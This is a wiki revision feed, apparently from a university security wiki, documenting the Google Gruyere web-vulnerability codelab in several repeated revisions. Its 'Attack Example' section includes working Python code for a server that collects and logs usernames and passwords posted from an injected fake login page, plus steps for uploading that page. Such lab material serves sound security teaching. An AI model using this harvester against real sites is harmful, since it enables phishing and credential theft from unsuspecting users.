&lt;br /&gt;
To access Google Gruyere follow the following Steps:&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Visit the [https://google-gruyere.appspot.com Google Gruyere website] and follow the instructions to start the exercises.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
After that, click &amp;quot;Continue&amp;quot;. This will lead you to [https://google-gruyere.appspot.com/part1 Part1] of the Website, where you lern how to access Gruyere, view the code and you will be given a few tasks to familiarize yourself with Gruyere. If you proceed to click &amp;quot;Continue&amp;quot; you will get to Part 2 - 5 of the Gruyere Website, where the challenges will be listed.&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
Now you can open the [https://google-gruyere.appspot.com/start Start link] to access the codelab.&lt;br /&gt;
&lt;br /&gt;
== Concepts used ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which malicious code is injected into a trusted website. The code is then executed by unsuspecting users, which can lead to data leaks or other security problems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Client-State Manipulation&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attacker manipulates the state of the client application (such as a web browser), often to circumvent security mechanisms or to fake false information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Request Forgery (XSRF)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which the attacker performs an action on behalf of an authenticated user, often without the user&#039;s knowledge or consent.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross Site Script Inclusion (XSSI)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A variant of XSS in which malicious scripts from an external source are integrated into a website.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Path Traversal&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack that is exploited to access files and directories located outside the intended web directory, often to obtain or manipulate sensitive data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Denial of Service (DoS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Attacks aimed at making a service, such as a website, inaccessible, often by overloading the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Code Execution&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A vulnerability that allows an attacker to execute arbitrary code on a target device or server, which can lead to a complete takeover.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Configuration Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Security vulnerabilities that arise due to misconfigurations in software or systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;AJAX Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Vulnerabilities in Asynchronous JavaScript and XML (AJAX) applications that often lead to problems such as insufficient validation of input data or insecure API endpoints.&lt;br /&gt;
&lt;br /&gt;
== Attack Example ==&lt;br /&gt;
&amp;lt;h3&amp;gt;Idea: &amp;lt;/h3&amp;gt;Inject a simulated HTML login page that mimics a certified platform. This page incorporates a script to capture the users login data and transmit it to an external malicious server, that logs the information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 1: Python Server&amp;lt;/h3&amp;gt;&lt;br /&gt;
Create a local HTTP server with python using BaseHTTPRequestHandler and HTTPServer from http.server. The log file is named passwrd.log in this example:&lt;br /&gt;
  from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
  import os&lt;br /&gt;
  from datetime import datetime&lt;br /&gt;
  from urllib.parse import parse_qs&lt;br /&gt;
  # Pfad zur Datei, in die geschrieben werden soll&lt;br /&gt;
  LOG_FILE = &amp;quot;passwrd.log&amp;quot;&lt;br /&gt;
  class RequestHandler(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_OPTIONS(self):&lt;br /&gt;
        # CORS-Header für Preflight-Anfragen setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Methods&#039;, &#039;POST, OPTIONS&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Headers&#039;, &#039;Content-Type&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
    def do_POST(self):&lt;br /&gt;
        # CORS-Header setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        # Content-Length auslesen, um die Größe der Daten zu kennen&lt;br /&gt;
        content_length = int(self.headers[&#039;Content-Length&#039;])&lt;br /&gt;
        post_data = self.rfile.read(content_length).decode(&#039;utf-8&#039;)&lt;br /&gt;
        # Eingabedaten parsen&lt;br /&gt;
        data = parse_qs(post_data)&lt;br /&gt;
        username = data.get(&#039;username&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        password = data.get(&#039;password&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        # Aktuelles Datum und Uhrzeit&lt;br /&gt;
        timestamp = datetime.now().strftime(&#039;%Y-%m-%d [%H:%M:%S]&#039;)&lt;br /&gt;
        # Logeintrag erstellen&lt;br /&gt;
        log_entry = f&amp;quot;{timestamp}: Username: {username} / Password: {password}\n&amp;quot;&lt;br /&gt;
        # Daten in die Datei schreiben&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;a&amp;quot;) as file:&lt;br /&gt;
            file.write(log_entry)&lt;br /&gt;
        # Erfolgsnachricht senden&lt;br /&gt;
        self.wfile.write(b&amp;quot;Data saved successfully\n&amp;quot;)&lt;br /&gt;
  # HTTP-Server starten&lt;br /&gt;
  def run_server():&lt;br /&gt;
    server_address = (&amp;quot;0.0.0.0&amp;quot;, 8080)&lt;br /&gt;
    httpd = HTTPServer(server_address, RequestHandler)&lt;br /&gt;
    print(f&amp;quot;Server running on http://0.0.0.0:8080, writing to {LOG_FILE}&amp;quot;)&lt;br /&gt;
    httpd.serve_forever()&lt;br /&gt;
  if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
    # Sicherstellen, dass die Logdatei existiert&lt;br /&gt;
    if not os.path.exists(LOG_FILE):&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;w&amp;quot;) as file:&lt;br /&gt;
            file.write(&amp;quot;&amp;quot;)&lt;br /&gt;
    run_server()&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1. Create an user account on Google Gruyere webpage&lt;br /&gt;
2. Go to the &amp;quot;Upload&amp;quot; Tab and upload the code of your login page&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://owasp.org/www-project-webgoat/ OWASP Webgoat]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=DVWA DVWA (Damn Vulnerable Web Application)]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://google-gruyere.appspot.com/&lt;br /&gt;
* https://google-gruyere.appspot.com/part1&lt;br /&gt;
* https://google-gruyere.appspot.com/start&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
* https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17613</id>
		<title>Google Gruyere</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17613"/>
		<updated>2024-12-18T19:20:50Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Google Gruyere is an educational codelab developed by Bruce Leban, Mugdha Bendre, and Parisa Tabriz to demonstrate common security vulnerabilities in web applications and provide solutions to these problems. It serves as a practical platform for learning how to identify and avoid security risks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div&amp;gt;&amp;lt;ul&amp;gt; &lt;br /&gt;
&amp;lt;li style=&amp;quot;display: inline-block;&amp;quot;&amp;gt; [[File:Gruyere 1.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]] &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
The Codelab is organized by types of vulnerabilities. In each section you will find a short description of a vulnerability and a task to find an example of this vulnerability in Gruyere. Our task now is to slip into the role of a malicious hacker and find and exploit the vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
If needed, there are further hints. There are also solutions on how to eliminate these security gaps.&lt;br /&gt;
&lt;br /&gt;
In the Codelab, we will use both black-box hacking and white-box hacking. Black-box hacking involves trying to find vulnerabilities by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess the server behavior. You do not have access to the source code.&lt;br /&gt;
&lt;br /&gt;
With white-box hacking, you have access to the source code and can perform automated or manual analysis to find errors. You can therefore treat Gruyere as if it were open source: read through the source code and try to find errors. Gruyere is written in Python, so a certain familiarity with Python can be helpful. However, the vulnerabilities covered are not Python-specific, and you can do most of the exercise without having to look at the code.&lt;br /&gt;
&lt;br /&gt;
== Access ==&lt;br /&gt;
&lt;br /&gt;
To access Google Gruyere follow the following Steps:&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Visit the [https://google-gruyere.appspot.com Google Gruyere website] and follow the instructions to start the exercises.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
After that, click &amp;quot;Continue&amp;quot;. This will lead you to [https://google-gruyere.appspot.com/part1 Part1] of the Website, where you lern how to access Gruyere, view the code and you will be given a few tasks to familiarize yourself with Gruyere. If you proceed to click &amp;quot;Continue&amp;quot; you will get to Part 2 - 5 of the Gruyere Website, where the challenges will be listed.&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
Now you can open the [https://google-gruyere.appspot.com/start Start link] to access the codelab.&lt;br /&gt;
&lt;br /&gt;
== Concepts used ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which malicious code is injected into a trusted website. The code is then executed by unsuspecting users, which can lead to data leaks or other security problems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Client-State Manipulation&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attacker manipulates the state of the client application (such as a web browser), often to circumvent security mechanisms or to fake false information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Request Forgery (XSRF)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which the attacker performs an action on behalf of an authenticated user, often without the user&#039;s knowledge or consent.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross Site Script Inclusion (XSSI)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A variant of XSS in which malicious scripts from an external source are integrated into a website.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Path Traversal&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack that is exploited to access files and directories located outside the intended web directory, often to obtain or manipulate sensitive data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Denial of Service (DoS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Attacks aimed at making a service, such as a website, inaccessible, often by overloading the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Code Execution&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A vulnerability that allows an attacker to execute arbitrary code on a target device or server, which can lead to a complete takeover.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Configuration Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Security vulnerabilities that arise due to misconfigurations in software or systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;AJAX Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Vulnerabilities in Asynchronous JavaScript and XML (AJAX) applications that often lead to problems such as insufficient validation of input data or insecure API endpoints.&lt;br /&gt;
&lt;br /&gt;
== Attack Example ==&lt;br /&gt;
&amp;lt;h3&amp;gt;Idea: &amp;lt;/h3&amp;gt;Inject a simulated HTML login page that mimics a certified platform. This page incorporates a script to capture the users login data and transmit it to an external malicious server, that logs the information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 1: Python Server&amp;lt;/h3&amp;gt;&lt;br /&gt;
Create a local HTTP server with python using BaseHTTPRequestHandler and HTTPServer from http.server&lt;br /&gt;
&lt;br /&gt;
1. Create an user account on Google Gruyere webpage&lt;br /&gt;
2. Go to the &amp;quot;Upload&amp;quot; Tab and upload the code of your login page&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://owasp.org/www-project-webgoat/ OWASP Webgoat]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=DVWA DVWA (Damn Vulnerable Web Application)]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://google-gruyere.appspot.com/&lt;br /&gt;
* https://google-gruyere.appspot.com/part1&lt;br /&gt;
* https://google-gruyere.appspot.com/start&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
* https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17605</id>
		<title>Google Gruyere</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17605"/>
		<updated>2024-12-18T19:12:01Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Google Gruyere is an educational codelab developed by Bruce Leban, Mugdha Bendre, and Parisa Tabriz to demonstrate common security vulnerabilities in web applications and provide solutions to these problems. It serves as a practical platform for learning how to identify and avoid security risks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div&amp;gt;&amp;lt;ul&amp;gt; &lt;br /&gt;
&amp;lt;li style=&amp;quot;display: inline-block;&amp;quot;&amp;gt; [[File:Gruyere 1.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]] &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
The Codelab is organized by types of vulnerabilities. In each section you will find a short description of a vulnerability and a task to find an example of this vulnerability in Gruyere. Our task now is to slip into the role of a malicious hacker and find and exploit the vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
If needed, there are further hints. There are also solutions on how to eliminate these security gaps.&lt;br /&gt;
&lt;br /&gt;
In the Codelab, we will use both black-box hacking and white-box hacking. Black-box hacking involves trying to find vulnerabilities by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess the server behavior. You do not have access to the source code.&lt;br /&gt;
&lt;br /&gt;
With white-box hacking, you have access to the source code and can perform automated or manual analysis to find errors. You can therefore treat Gruyere as if it were open source: read through the source code and try to find errors. Gruyere is written in Python, so a certain familiarity with Python can be helpful. However, the vulnerabilities covered are not Python-specific, and you can do most of the exercise without having to look at the code.&lt;br /&gt;
&lt;br /&gt;
== Access ==&lt;br /&gt;
&lt;br /&gt;
To access Google Gruyere follow the following Steps:&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Visit the [https://google-gruyere.appspot.com Google Gruyere website] and follow the instructions to start the exercises.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
After that, click &amp;quot;Continue&amp;quot;. This will lead you to [https://google-gruyere.appspot.com/part1 Part1] of the Website, where you lern how to access Gruyere, view the code and you will be given a few tasks to familiarize yourself with Gruyere. If you proceed to click &amp;quot;Continue&amp;quot; you will get to Part 2 - 5 of the Gruyere Website, where the challenges will be listed.&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
Now you can open the [https://google-gruyere.appspot.com/start Start link] to access the codelab.&lt;br /&gt;
&lt;br /&gt;
== Concepts used ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which malicious code is injected into a trusted website. The code is then executed by unsuspecting users, which can lead to data leaks or other security problems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Client-State Manipulation&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attacker manipulates the state of the client application (such as a web browser), often to circumvent security mechanisms or to fake false information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Request Forgery (XSRF)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which the attacker performs an action on behalf of an authenticated user, often without the user&#039;s knowledge or consent.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross Site Script Inclusion (XSSI)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A variant of XSS in which malicious scripts from an external source are integrated into a website.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Path Traversal&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack that is exploited to access files and directories located outside the intended web directory, often to obtain or manipulate sensitive data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Denial of Service (DoS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Attacks aimed at making a service, such as a website, inaccessible, often by overloading the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Code Execution&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A vulnerability that allows an attacker to execute arbitrary code on a target device or server, which can lead to a complete takeover.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Configuration Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Security vulnerabilities that arise due to misconfigurations in software or systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;AJAX Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Vulnerabilities in Asynchronous JavaScript and XML (AJAX) applications that often lead to problems such as insufficient validation of input data or insecure API endpoints.&lt;br /&gt;
&lt;br /&gt;
== Attack Example ==&lt;br /&gt;
&amp;lt;h3&amp;gt;Idea: &amp;lt;/h3&amp;gt;Inject a simulated HTML login page that mimics a certified platform. This page incorporates a script to capture the users login data and transmit it to an external malicious server, that logs the information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Tools needed.&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://owasp.org/www-project-webgoat/ OWASP Webgoat]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=DVWA DVWA (Damn Vulnerable Web Application)]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://google-gruyere.appspot.com/&lt;br /&gt;
* https://google-gruyere.appspot.com/part1&lt;br /&gt;
* https://google-gruyere.appspot.com/start&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
* https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
</feed>